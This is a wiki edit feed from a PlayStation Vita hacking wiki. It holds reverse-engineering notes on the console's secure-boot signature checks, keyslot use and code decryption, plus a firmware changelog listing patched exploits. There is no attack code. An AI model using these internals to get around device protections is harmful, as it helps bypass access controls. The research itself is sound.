2 bytes are read from keyring slot 0x603. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, the enc's RSA revision is checked against the mask and, if it is allowed, the modulus is taken from the keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes long. After calculating the powmod, the padding is checked and the previously calculated HMAC-SHA256 is compared against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable reading out the modulus.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and the metadata buffer (0x20 bytes at offset 0xE0), the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14 and 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is the HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated HMAC is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected depending on a bit flags buffer located right after the plaintext version string (so at offset 0x50). However, on the latest 3.68 enc it is all zeroes, so no keys should be protected by this function (?)<br />
<br />
=== Decrypting code ===<br />
<br />
Code is decrypted using key 10 and a hard-coded IV. Then, the key is protected.<br />
<br />
=== Clear ===<br />
<br />
The remainder (0x1C000 - code_sz) after the decrypted code is cleared with dmac. Dmac regs are also cleared.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=MediaWiki:Sidebar&diff=10166MediaWiki:Sidebar2019-01-21T23:28:49Z<p>Xyz: </p>
<hr />
<div><br />
* navigation<br />
** mainpage|mainpage-description<br />
** recentchanges-url|recentchanges<br />
** randompage-url|randompage<br />
** helppage|help<br />
* Quick Links<br />
** Modules|Modules<br />
** Kernel|Kernel<br />
** System_Software|Software<br />
** Vulnerabilities|Vulnerabilities<br />
* SEARCH<br />
* TOOLBOX<br />
* LANGUAGES</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=10162System Software2019-01-20T21:45:42Z<p>Xyz: /* Version 3 */</p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists has been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several game exploits, in Fieldrunners and other titles that had not been publicly disclosed, have been fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles have been fixed.<br />
* Savegame exploits in various additional, undisclosed exploit titles have been fixed as well.<br />
* Internal firmware changes now prevent the execution of larger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with larger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* A full array of languages has been added to [External Keyboard] settings (previously Japanese and US English only).<ref name=330jp/><br />
* The [Import Saved Data] feature, which was broken by the release of system software 3.15, has been fixed.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and its compatibility with HTML5/JavaScript content have been made. The HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2 October 2014, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support has been added to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
